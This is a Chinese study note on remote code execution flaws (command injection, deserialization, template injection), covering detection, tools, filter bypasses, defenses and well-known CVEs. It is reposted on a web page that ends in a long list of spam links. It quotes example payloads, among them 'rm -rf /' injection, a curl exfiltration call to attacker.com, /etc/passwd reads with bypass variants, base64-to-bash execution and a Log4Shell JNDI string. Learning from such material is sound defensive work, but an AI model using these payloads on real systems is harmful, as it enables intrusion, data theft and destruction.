当前位置: 首页 > wzjs >正文

建立网站 wordpress推广赚钱的软件

建立网站 wordpress,推广赚钱的软件,电子科技网站模板,百度刷搜索词RCE漏洞学习笔记 1. 基本概念 定义:攻击者通过漏洞在目标服务器上执行任意命令或代码 危害等级:高危(直接影响服务器控制权) 常见场景: Web应用参数未过滤(如URL、表单、HTTP头) 反序列化漏…

RCE漏洞学习笔记

1. 基本概念

  • 定义:攻击者通过漏洞在目标服务器上执行任意命令或代码

  • 危害等级:高危(直接影响服务器控制权)

  • 常见场景

    • Web应用参数未过滤(如URL、表单、HTTP头)

    • 反序列化漏洞

    • 第三方组件漏洞(如Log4j2、Fastjson)

    • 文件上传 + 解析漏洞


2. RCE漏洞类型

2.1 命令注入(Command Injection)

  • 原理:通过拼接系统命令执行恶意指令

  • 示例

    php

    // PHP示例
    $ip = $_GET['ip'];
    system("ping -c 4 " . $ip);  // 攻击者输入:127.0.0.1; rm -rf /
  • 常用Payload

    ; command          # Unix分号分隔
    | command          # 管道符
    && command         # 逻辑与
    || command         # 逻辑或
    `command`          # 反引号执行
    $(command)         # 子shell执行

2.2 反序列化RCE

  • 原理:利用反序列化操作触发危险方法(如PHP的__destruct、Java的readObject

  • 经典漏洞

    • Java: Fastjson(CVE-2022-25845)、Jackson

    • Python: Pickle反序列化

    • PHP: Phar反序列化

2.3 模板注入(SSTI)

  • 原理:模板引擎解析用户输入为代码

    python

    # Flask示例(Jinja2)
    @app.route('/hello/<name>')
    def hello(name):return render_template_string(f'Hello {name}!')
    # 攻击输入:{{7*7}} → 输出Hello 49!
  • 常见引擎

    • Java: FreeMarker、Velocity

    • Python: Jinja2、Mako

    • PHP: Twig、Smarty

2.4 其他类型

  • 文件包含漏洞php://input + POST代码执行

  • 表达式注入:SpEL(Spring)、OGNL(Struts2)

  • 内存破坏漏洞:缓冲区溢出(C/C++程序)


3. 实战利用技巧

3.1 检测方法

  • 黑盒测试

    • 输入特殊字符测试命令拼接(; | >等)

    • 使用延时命令判断(如ping -c 4 127.0.0.1sleep 5

    • DNS外带数据检测:curl http://attacker.com/$(whoami)

  • 白盒审计

    • 搜索危险函数:

      bash

      # PHP
      system(), exec(), passthru(), eval()
      # Java
      Runtime.getRuntime().exec()
      # Python
      os.system(), subprocess.run()

3.2 常用工具

  • 漏洞扫描

    • Burp Suite(手工测试)

    • Nuclei(自动化模板)

  • 利用框架

    • Metasploit(exploit/multi/http/log4shell_rce

    • SQLMap(--os-shell参数)

  • Payload生成

    • RevShells(反向Shell生成)

    • CyberChef(编码转换)

3.3 绕过防御

  • 过滤绕过

    bash

    # 空格绕过
    cat</etc/passwd
    {cat,/etc/passwd}
    ​
    # 关键字绕过
    c\at /etc/passwd
    c''at /etc/passwd
  • 编码绕过

    bash

    # Base64
    echo 'whoami' | base64 → d2hvYW1pCg==
    echo d2hvYW1pCg== | base64 -d | bash

4. 防御方案

4.1 输入处理

  • 白名单验证:限制用户输入格式(如IP地址正则)

  • 敏感字符过滤:移除; | &等危险符号

  • 参数化处理:避免直接拼接命令

    python

    # 错误方式
    os.system(f"ping {ip}")
    ​
    # 正确方式(Python示例)
    subprocess.run(['ping', '-c', '4', ip], check=True)

4.2 安全配置

  • 最小权限原则:运行服务的用户使用低权限账户

  • 禁用危险函数

    php

    ; php.ini
    disable_functions = system, exec, passthru
  • 沙箱隔离:使用Docker容器或沙箱环境运行不可信代码

4.3 其他防护

  • WAF规则:拦截常见RCE特征(如/etc/passwdwhoami

  • 日志监控:记录命令执行行为并设置告警

  • 依赖管理:及时更新第三方库(如修复Log4j2)


5. 经典漏洞案例

  1. Log4j2 RCE(CVE-2021-44228)

    • 利用Payload:${jndi:ldap://attacker.com/exp}

    • 防御:升级到Log4j 2.17.0+

  2. Spring4Shell(CVE-2022-22965)

    • 利用条件:JDK 9+ + Tomcat部署

    • 攻击路径:通过数据绑定修改日志路径上传Webshell

  3. Apache Struts2 RCE(S2-045)

    • 漏洞点:错误处理时的OGNL表达式执行

    • Payload示例:%{(#_='multipart/form-data').(...)}


6. 学习资源

  • 靶场练习

    • DVWA(Command Injection模块)

    • PortSwigger Web Security Academy

    • VulnHub漏洞环境

  • 参考资料

    • OWASP Top 10(A03: Injection)

    • PayloadsAllTheThings - RCE

    • 《白帽子讲Web安全》


文章转载自:

http://CvtKhXi7.yhywx.cn
http://QVP1NEW3.yhywx.cn
http://5rfFo4j8.yhywx.cn
http://ShFxkS38.yhywx.cn
http://WCEM4TaW.yhywx.cn
http://E3fyzKln.yhywx.cn
http://CXn4hoR8.yhywx.cn
http://4WiXPwwL.yhywx.cn
http://kHhrrBiZ.yhywx.cn
http://nm4GXTPQ.yhywx.cn
http://zLtjwMV2.yhywx.cn
http://f3sAsxcR.yhywx.cn
http://MOR8iXsb.yhywx.cn
http://aTkXMTvC.yhywx.cn
http://BEg0YDlH.yhywx.cn
http://FLzP1ue2.yhywx.cn
http://r6Lc9VhW.yhywx.cn
http://sWa4QEeR.yhywx.cn
http://5i9iDQVt.yhywx.cn
http://sxXTwb4m.yhywx.cn
http://ANABF8Zb.yhywx.cn
http://W9a9HJMd.yhywx.cn
http://3TYUhRSu.yhywx.cn
http://L0987kG1.yhywx.cn
http://5A4OrYeE.yhywx.cn
http://Ss6hAwST.yhywx.cn
http://1RJJLzqx.yhywx.cn
http://NyaJTg9I.yhywx.cn
http://ycTj6JXc.yhywx.cn
http://hXyGKszV.yhywx.cn
http://www.dtcms.com/wzjs/728247.html

相关文章:

  • 电子商务网站开发背景和意义手机网站 用户体验
  • 江津网站建设国内优秀vi设计案例
  • 专业的设计网站有哪些wordpress php扩展
  • 东圃手机网站建设WordPress桌面
  • 网站建设培训达内网站加上视频对seo影响
  • 昆明调整高风险地区重庆seo团队
  • 世界知名网站邢台营销型网站制作
  • 亿赐客网站怎么样做返利网站
  • 做网站要学什么自己怎么拍做美食视频网站
  • logo网站设计论文天河区住房和建设水务局网站
  • 大足建网站的本地网站地图生成器
  • 做网站的时候怎么把图片往左移自媒体平台大全
  • editplus建设网站教学江苏优化网站公司
  • 做印刷网站公司哪家好做中国旅游网站的目的与必要性
  • 散热器 东莞网站建设wape
  • 普同网站跟营销型网站的区别外国炫酷网站
  • 工程师报考网站域名商的网站
  • 红色网站源码网页搭建公司
  • 找大学生做网站要多少钱搬瓦工vps wordpress
  • 网站 栏目 英语一建二建报考条件及专业要求
  • 手机端企业网站源码下载常州网站建设外包公司哪家好
  • 网站开发的工作经验东莞气缸东莞网站建设
  • 建设网站链接建设工程监理
  • 网站分析案例如何做好一个营销方案
  • 关于制作网站的方案怎么做网站推广最有效
  • jsp做网站组件最简单的手机网站制作
  • 网站 php .net广州网站建
  • 个人网站和企业网站的区别免费手机网站建站系统
  • 山东金融行业网站开发电商网站开发的流程图
  • 建设银行福建分行招聘网站wordpress和django哪个好